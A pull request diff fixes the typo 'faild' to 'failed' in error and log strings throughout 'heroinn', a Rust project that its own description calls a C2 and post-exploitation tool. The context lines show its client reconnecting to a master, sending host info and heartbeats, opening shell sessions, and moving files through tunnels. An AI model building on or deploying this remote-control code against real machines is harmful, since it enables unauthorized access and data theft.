### PR TITLE
fix: correct faild to failed typos in Rust files (67 instances)

### DIFF
--- a/heroinn_client/src/config.rs
+++ b/heroinn_client/src/config.rs
@@ -27,7 +27,7 @@ pub fn master_configure() -> ConnectionInfo {
     match ConnectionInfo::parse(&G_DNA.data[..size as usize].to_vec()) {
         Ok(p) => p,
         Err(_) => {
-            log::error!("parse master connection info faild");
+            log::error!("parse master connection info failed");
             std::process::exit(0);
         }
     }

--- a/heroinn_client/src/main.rs
+++ b/heroinn_client/src/main.rs
@@ -94,7 +94,7 @@ fn main() {
         ) {
             Ok(p) => p,
             Err(e) => {
-                log::info!("connect faild : {}", e);
+                log::info!("connect failed : {}", e);
                 std::thread::sleep(Duration::from_secs(5));
                 continue;
             }
@@ -141,7 +141,7 @@ fn main() {
             match Message::build(HeroinnClientMsgID::HostInfo.to_u8(), &clientid, hostinfo) {
                 Ok(p) => p,
                 Err(e) => {
-                    log::error!("make HostInfo packet faild : {}", e);
+                    log::error!("make HostInfo packet failed : {}", e);
                     client.close();
                     continue;
                 }
@@ -150,7 +150,7 @@ fn main() {
         match client.send(&mut buf) {
             Ok(p) => p,
             Err(e) => {
-                log::error!("send HostInfo packet faild : {}", e);
+                log::error!("send HostInfo packet failed : {}", e);
                 client.close();
                 continue;
             }
@@ -206,7 +206,7 @@ fn main() {
                 ) {
                     Ok(p) => p,
                     Err(e) => {
-                        log::error!("make Heartbeat packet faild : {}", e);
+                        log::error!("make Heartbeat packet failed : {}", e);
                         break;
                     }
                 };
@@ -214,7 +214,7 @@ fn main() {
                 match sender_1.send(buf) {
                     Ok(p) => p,
                     Err(e) => {
-                        log::error!("send Heartbeat packet to channel faild : {}", e);
+                        log::error!("send Heartbeat packet to channel failed : {}", e);
                         break;
                     }
                 };
@@ -265,7 +265,7 @@ fn main() {
                             ) {
                                 Ok(p) => p,
                                 Err(e) => {
-                                    log::error!("create shell session faild : {}", e);
+                                    log::error!("create shell session failed : {}", e);
                                     continue;
                                 }
                             };
@@ -318,7 +318,7 @@ fn main() {
                     }
                 }
                 Err(e) => {
-                    log::error!("connection recv faild : {}", e);
+                    log::error!("connection recv failed : {}", e);
                     client.close();
                     break;
                 }

--- a/heroinn_client/src/module/ftp.rs
+++ b/heroinn_client/src/module/ftp.rs
@@ -108,7 +108,7 @@ impl Session for FtpClient {
                     ) {
                         Ok(p) => p,
                         Err(e) => {
-                            log::error!("create tunnel faild : {}", e);
+                            log::error!("create tunnel failed : {}", e);
                             return;
                         }
                     };
@@ -116,7 +116,7 @@ impl Session for FtpClient {
                     let header = match client.recv() {
                         Ok(p) => p,
                         Err(e) => {
-                            log::error!("recv get header tunnel faild : {}", e);
+                            log::error!("recv get header tunnel failed : {}", e);
                             return;
                         }
                     };
@@ -126,7 +126,7 @@ impl Session for FtpClient {
                     let mut f = match std::fs::File::open(&header.path) {
                         Ok(p) => p,
                         Err(e) => {
-                            log::error!("open file faild : {}", e);
+                            log::error!("open file failed : {}", e);
                             return;
                         }
                     };
@@ -135,7 +135,7 @@ impl Session for FtpClient {
                         match f.seek(SeekFrom::Start(header.start_pos)) {
                             Ok(p) => p,
                             Err(e) => {
-                                log::error!("seek file faild : {}", e);
+                                log::error!("seek file failed : {}", e);
                                 return;
                             }
                         };
@@ -152,7 +152,7 @@ impl Session for FtpClient {
                         let size = match f.read(&mut buf) {
                             Ok(p) => p,
                             Err(e) => {
-                                log::error!("read file faild : {}", e);
+                                log::error!("read file failed : {}", e);
                                 break;
                             }
                         };
@@ -165,7 +165,7 @@ impl Session for FtpClient {
                         match client.send(&mut buf[..size]) {
                             Ok(_) => {}
                             Err(e) => {
-                                log::error!("get worker send to server faild : {}", e);
+                                log::error!("get worker send to server failed : {}", e);
                                 break;
                             }
                         };
@@ -188,7 +188,7 @@ impl Session for FtpClient {
                     ) {
                         Ok(p) => p,
                         Err(e) => {
-                            log::error!("create tunnel faild : {}", e);
+                            log::error!("create tunnel failed : {}", e);
                             return;
                         }
                     };
@@ -197,7 +197,7 @@ impl Session for FtpClient {
                     let header = match client.recv() {
                         Ok(p) => p,
                         Err(e) => {
-                            log::error!("recv get header faild : {}", e);
+                            log::error!("recv get header failed : {}", e);
                             return;
                         }
                     };
@@ -205,7 +205,7 @@ impl Session for FtpClient {
                     let header = match FTPPutHeader::parse(&header) {
                         Ok(p) => p,
                         Err(e) => {
-                            log::error!("parse get header faild : {}", e);
+                            log::error!("parse get header failed : {}", e);
                             return;
                         }
                     };
@@ -214,7 +214,7 @@ impl Session for FtpClient {
                         match std::fs::File::create(&header.path) {
                             Ok(p) => p,
                             Err(e) => {
-                                log::error!("create remote file faild [{}] : {}", header.path, e);
+                                log::error!("create remote file failed [{}] : {}", header.path, e);
                                 return;
                             }
                         }
@@ -222,7 +222,7 @@ impl Session for FtpClient {
                         let mut f = match std::fs::File::options().write(true).open(&header.path) {
                             Ok(p) => p,
                             Err(e) => {
-                                log::error!("open remote file faild [{}] : {}", header.path, e);
+                                log::error!("open remote file failed [{}] : {}", header.path, e);
                                 return;
                             }
                         };
@@ -230,7 +230,7 @@ impl Session for FtpClient {
                         match f.seek(SeekFrom::Start(header.start_pos)) {
                             Ok(p) => p,
                             Err(e) => {
-                                log::error!("seek remote file faild [{}] : {}", header.path, e);
+                                log::error!("seek remote file failed [{}] : {}", header.path, e);
                                 return;
                             }
                         };
@@ -247,7 +247,7 @@ impl Session for FtpClient {
                         let data = match client.recv() {
                             Ok(p) => p,
                             Err(e) => {
-                                log::error!("recv data faild from ftp slave : {}", e);
+                                log::error!("recv data failed from ftp slave : {}", e);
                                 break;
                             }
                         };
@@ -259,7 +259,7 @@ impl Session for FtpClient {
                         match f.write_all(&data) {
                             Ok(_) => {}
                             Err(e) => {
-                                log::error!("write download file faild : {}", e);
+                                log::error!("write download file failed : {}", e);
                                 break;
                             }
                         };
@@ -267,7 +267,7 @@ impl Session for FtpClient {
                         let pos = match f.stream_position() {
                             Ok(p) => p,
                             Err(e) => {
-                                log::error!("get localfile size faild : {}", e);
+                                log::error!("get localfile size failed : {}", e);
                                 break;
                             }
                         };

--- a/heroinn_util/src/ftp/mod.rs
+++ b/heroinn_util/src/ftp/mod.rs
@@ -65,7 +65,7 @@ impl FTPGetHeader {
             Err(_) => {
                 Err(std::io::Error::new(
                     std::io::ErrorKind::InvalidData,
-                    "serilize FTPGetHeader packet faild",
+                    "serilize FTPGetHeader packet failed",
                 ))
             }
         }
@@ -91,7 +91,7 @@ impl FTPPutHeader {
             Err(_) => {
                 Err(std::io::Error::new(
                     std::io::ErrorKind::InvalidData,
-                    "serilize FTPPutHeader packet faild",
+                    "serilize FTPPutHeader packet failed",
                 ))
             }
         }
@@ -110,7 +110,7 @@ impl FTPPacket {
             Err(_) => {
                 Err(std::io::Error::new(
                     std::io::ErrorKind::InvalidData,
-                    "serilize FTPPacket packet faild",
+                    "serilize FTPPacket packet failed",
                 ))
             }
         }
@@ -128,7 +128,7 @@ impl FileInfo {
             Err(e) => {
                 Err(std::io::Error::new(
                     std::io::ErrorKind::InvalidData,
-                    format!("serilize disk info faild : {}", e),
+                    format!("serilize disk info failed : {}", e),
                 ))
             }
         }

--- a/heroinn_util/src/lib.rs
+++ b/heroinn_util/src/lib.rs
@@ -85,7 +85,7 @@ impl ConnectionInfo {
             Err(_) => {
                 Err(std::io::Error::new(
                     std::io::ErrorKind::InvalidData,
-                    "serilize TunnelRequest packet faild",
+                    "serilize TunnelRequest packet failed",
                 ))
             }
         }

--- a/heroinn_util/src/packet.rs
+++ b/heroinn_util/src/packet.rs
@@ -26,7 +26,7 @@ impl TunnelRequest {
             Err(_) => {
                 Err(std::io::Error::new(
                     std::io::ErrorKind::InvalidData,
-                    "serilize TunnelRequest packet faild",
+                    "serilize TunnelRequest packet failed",
                 ))
             }
         }

--- a/heroinn_util/src/protocol/http.rs
+++ b/heroinn_util/src/protocol/http.rs
@@ -117,7 +117,7 @@ impl Server for WSServer {
                                                     Ok(p) => p,
                                                     Err(e) => {
                                                         log::error!(
-                                                            "tunnel connect faild : {}",
+                                                            "tunnel connect failed : {}",
                                                             e
                                                         );
                                                         break;
@@ -136,7 +136,7 @@ impl Server for WSServer {
                                                             Ok(p) => p,
                                                             Err(e) => {
                                                                 log::error!(
-                                                                    "tunnel read faild : {}",
+                                                                    "tunnel read failed : {}",
                                                                     e
                                                                 );
                                                                 break;

--- a/heroinn_util/src/protocol/tcp.rs
+++ b/heroinn_util/src/protocol/tcp.rs
@@ -105,7 +105,7 @@ impl Server for TcpServer {
                                             {
                                                 Ok(p) => p,
                                                 Err(e) => {
-                                                    log::error!("tunnel connect faild : {}", e);
+                                                    log::error!("tunnel connect failed : {}", e);
                                                     break;
                                                 }
                                             };
@@ -125,7 +125,7 @@ impl Server for TcpServer {
                                                         &mut s_2,
                                                     ) {
                                                         log::error!(
-                                                            "tunnel1 io copy faild : {}",
+                                                            "tunnel1 io copy failed : {}",
                                                             e
                                                         );
                                                     };
@@ -148,7 +148,7 @@ impl Server for TcpServer {
                                                         &mut tunnel_client_2,
                                                     ) {
                                                         log::error!(
-                                                            "tunnel2 io copy faild : {}",
+                                                            "tunnel2 io copy failed : {}",
                                                             e
                                                         );
                                                     };

--- a/heroinn_util/src/protocol/udp/mod.rs
+++ b/heroinn_util/src/protocol/udp/mod.rs
@@ -104,7 +104,7 @@ impl Server for UDPServer {
                                     {
                                         Ok(p) => p,
                                         Err(e) => {
-                                            log::error!("tunnel connect faild : {}", e);
+                                            log::error!("tunnel connect failed : {}", e);
                                             break;
                                         }
                                     };
@@ -122,7 +122,7 @@ impl Server for UDPServer {
                                                     Ok(p) => p,
                                                     Err(e) => {
                                                         log::error!(
-                                                            "tunnel read faild : {}",
+                                                            "tunnel read failed : {}",
                                                             e
                                                         );
                                                         break;

--- a/heroinn_util/src/rpc.rs
+++ b/heroinn_util/src/rpc.rs
@@ -31,7 +31,7 @@ impl RpcMessage {
             Err(_) => {
                 Err(std::io::Error::new(
                     std::io::ErrorKind::InvalidData,
-                    "serilize RpcMessage faild",
+                    "serilize RpcMessage failed",
                 ))
             }
         }

--- a/th3rd/heroinn_ftp/src/controller.rs
+++ b/th3rd/heroinn_ftp/src/controller.rs
@@ -17,7 +17,7 @@ fn send_ftp_packet(sender: &Sender<FTPPacket>, packet: FTPPacket) -> Result<()> 
         Ok(_) => Ok(()),
         Err(_) => Err(std::io::Error::new(
             std::io::ErrorKind::Interrupted,
-            "sender ftp packet faild",
+            "sender ftp packet failed",
         )),
     }
 }
@@ -186,7 +186,7 @@ pub fn download_file(
             match f.seek(SeekFrom::Start(header.start_pos)) {
                 Ok(_) => {}
                 Err(e) => {
-                    log::error!("seek local file faild : {}", e);
+                    log::error!("seek local file failed : {}", e);
                     return Err(e);
                 }
             };
@@ -232,7 +232,7 @@ pub fn download_file(
             }) {
                 Ok(_) => {}
                 Err(e) => {
-                    log::error!("send open tunnel msg faild : {}", e);
+                    log::error!("send open tunnel msg failed : {}", e);
                     return;
                 }
             }
@@ -240,7 +240,7 @@ pub fn download_file(
             let (mut s, _) = match TcpConnection::tunnel_server(server, 10) {
                 Ok(p) => p,
                 Err(e) => {
-                    log::error!("create tunnel server faild : {}", e);
+                    log::error!("create tunnel server failed : {}", e);
                     return;
                 }
             };
@@ -248,7 +248,7 @@ pub fn download_file(
             match s.send(&mut header.serialize().unwrap()) {
                 Ok(_) => {}
                 Err(e) => {
-                    log::error!("send get header faild : {}", e);
+                    log::error!("send get header failed : {}", e);
                     return;
                 }
             };
@@ -277,7 +277,7 @@ pub fn download_file(
                 let data = match s.recv() {
                     Ok(p) => p,
                     Err(e) => {
-                        log::error!("recv data faild from ftp slave : {}", e);
+                        log::error!("recv data failed from ftp slave : {}", e);
                         break;
                     }
                 };
@@ -289,7 +289,7 @@ pub fn download_file(
                 match f.write_all(&data) {
                     Ok(_) => {}
                     Err(e) => {
-                        log::error!("write download file faild : {}", e);
+                        log::error!("write download file failed : {}", e);
                         break;
                     }
                 };
@@ -297,7 +297,7 @@ pub fn download_file(
                 let pos = match f.stream_position() {
                     Ok(p) => p,
                     Err(e) => {
-                        log::error!("get localfile size faild : {}", e);
+                        log::error!("get localfile size failed : {}", e);
                         break;
                     }
                 };
@@ -395,7 +395,7 @@ pub fn upload_file(
             }) {
                 Ok(_) => {}
                 Err(e) => {
-                    log::error!("send open tunnel msg faild : {}", e);
+                    log::error!("send open tunnel msg failed : {}", e);
                     return;
                 }
             }
@@ -403,7 +403,7 @@ pub fn upload_file(
             let (mut s, _) = match TcpConnection::tunnel_server(server, 10) {
                 Ok(p) => p,
                 Err(e) => {
-                    log::error!("create tunnel server faild : {}", e);
+                    log::error!("create tunnel server failed : {}", e);
                     return;
                 }
             };
@@ -411,7 +411,7 @@ pub fn upload_file(
             match s.send(&mut header.serialize().unwrap()) {
                 Ok(p) => p,
                 Err(e) => {
-                    log::error!("send get header faild : {}", e);
+                    log::error!("send get header failed : {}", e);
                     return;
                 }
             };
@@ -422,7 +422,7 @@ pub fn upload_file(
                 match f.seek(SeekFrom::Start(header.start_pos)) {
                     Ok(_) => {}
                     Err(e) => {
-                        log::error!("seek start pos faild : {}", e);
+                        log::error!("seek start pos failed : {}", e);
                         return;
                     }
                 };
@@ -453,7 +453,7 @@ pub fn upload_file(
                 let size = match f.read(&mut buf) {
                     Ok(p) => p,
                     Err(e) => {
-                        log::error!("read file faild : {}", e);
+                        log::error!("read file failed : {}", e);
                         break;
                     }
                 };
@@ -466,7 +466,7 @@ pub fn upload_file(
                 match s.send(&mut buf[..size]) {
                     Ok(_) => {}
                     Err(e) => {
-                        log::error!("get worker send to server faild : {}", e);
+                        log::error!("get worker send to server failed : {}", e);
                         break;
                     }
                 };
@@ -484,7 +484,7 @@ pub fn upload_file(
                 let pos = match f.stream_position() {
                     Ok(p) => p,
                     Err(e) => {
-                        log::error!("get localfile size faild : {}", e);
+                        log::error!("get localfile size failed : {}", e);
                         break;
                     }
                 };

--- a/th3rd/heroinn_ftp/src/main.rs
+++ b/th3rd/heroinn_ftp/src/main.rs
@@ -257,7 +257,7 @@ impl FtpApp {
                                             self.local_disk_info = match get_local_folder_info(&fullpath){
                                                 Ok(p) => p,
                                                 Err(e) => {
-                                                    msgbox::error(&"heroinn FTP".to_string(), &format!("get folder info faild : {}" ,e));
+                                                    msgbox::error(&"heroinn FTP".to_string(), &format!("get folder info failed : {}" ,e));
                                                     ui.close_menu();
                                                     return;
                                                 },
@@ -288,7 +288,7 @@ impl FtpApp {
                                             let fullpath = match get_remote_join_path(&self.sender ,&parent_path, &".".to_string()){
                                                 Ok(p) => p,
                                                 Err(e) => {
-                                                    msgbox::error(&self.title.to_string(), &format!("join remote path faild : {}" ,e));
+                                                    msgbox::error(&self.title.to_string(), &format!("join remote path failed : {}" ,e));
                                                     ui.close_menu();
                                                     return;
                                                 },
@@ -298,7 +298,7 @@ impl FtpApp {
                                             self.remote_disk_info = match get_remote_folder_info(&self.sender , &fullpath){
                                                 Ok(p) => p,
                                                 Err(e) => {
-                                                    msgbox::error(&self.title.to_string(), &format!("get remote folder info faild : {}" ,e));
+                                                    msgbox::error(&self.title.to_string(), &format!("get remote folder info failed : {}" ,e));
                                                     ui.close_menu();
                                                     return;
                                                 },
@@ -392,7 +392,7 @@ impl FtpApp {
                                             Err(e) => {
                                                 msgbox::error(
                                                     &self.title.to_string(),
-                                                    &format!("get folder info faild : {}", e),
+                                                    &format!("get folder info failed : {}", e),
                                                 );
                                                 ui.close_menu();
                                                 return;
@@ -411,7 +411,7 @@ impl FtpApp {
                                         Err(e) => {
                                             msgbox::error(
                                                 &self.title.to_string(),
-                                                &format!("join remote path faild : {}", e),
+                                                &format!("join remote path failed : {}", e),
                                             );
                                             ui.close_menu();
                                             return;
@@ -425,7 +425,7 @@ impl FtpApp {
                                                 msgbox::error(
                                                     &self.title.to_string(),
                                                     &format!(
-                                                        "get remote folder info faild : {}",
+                                                        "get remote folder info failed : {}",
                                                         e
                                                     ),
                                                 );
@@ -455,7 +455,7 @@ impl FtpApp {
                                                 Err(e) => {
                                                     msgbox::error(
                                                         &self.title.to_string(),
-                                                        &format!("join remote path faild : {}", e),
+                                                        &format!("join remote path failed : {}", e),
                                                     );
                                                     ui.close_menu();
                                                     return;
@@ -480,7 +480,7 @@ impl FtpApp {
                                                     msgbox::error(
                                                         &self.title.to_string(),
                                                         &format!(
-                                                            "download remote file faild : {}",
+                                                            "download remote file failed : {}",
                                                             e
                                                         ),
                                                     );
@@ -510,7 +510,7 @@ impl FtpApp {
                                             Err(e) => {
                                                 msgbox::error(
                                                     &self.title.to_string(),
-                                                    &format!("join remote path faild : {}", e),
+                                                    &format!("join remote path failed : {}", e),
                                                 );
                                                 ui.close_menu();
                                                 return;
@@ -535,7 +535,7 @@ impl FtpApp {
                                                 msgbox::error(
                                                     &self.title.to_string(),
                                                     &format!(
-                                                        "download remote file faild : {}",
+                                                        "download remote file failed : {}",
                                                         e
                                                     ),
                                                 );
@@ -564,7 +564,7 @@ impl FtpApp {
                                             Err(e) => {
                                                 msgbox::error(
                                                     &self.title.to_string(),
-                                                    &format!("join remote path faild : {}", e),
+                                                    &format!("join remote path failed : {}", e),
                                                 );
                                                 ui.close_menu();
                                                 return;
@@ -577,7 +577,7 @@ impl FtpApp {
                                                 msgbox::error(
                                                     &self.title.to_string(),
                                                     &format!(
-                                                        "delete remote file info faild : {}",
+                                                        "delete remote file info failed : {}",
                                                         e
                                                     ),
                                                 );
@@ -603,7 +603,7 @@ impl FtpApp {
                                             Err(e) => {
                                                 msgbox::error(
                                                     &self.title.to_string(),
-                                                    &format!("delete local file faild : {}", e),
+                                                    &format!("delete local file failed : {}", e),
                                                 );
                                                 ui.close_menu();
                                                 return;
@@ -784,7 +784,7 @@ impl FtpApp {
             Err(e) => {
                 msgbox::error(
                     &"heroinn FTP".to_string(),
-                    &format!("get folder info faild : {}", e),
+                    &format!("get folder info failed : {}", e),
                 );
                 vec![]
             }
@@ -809,7 +809,7 @@ impl FtpApp {
             Err(e) => {
                 msgbox::error(
                     &"heroinn FTP".to_string(),
-                    &format!("get remote folder info faild : {}", e),
+                    &format!("get remote folder info failed : {}", e),
                 );
                 vec![]
             }


### PR DESCRIPTION
Correct `faild` to `failed` typos in 67 locations across 12 Rust files (log::error!, log::info!, msgbox::error!, format! strings). These are user-facing error messages shown during C2/post-exploitation operations.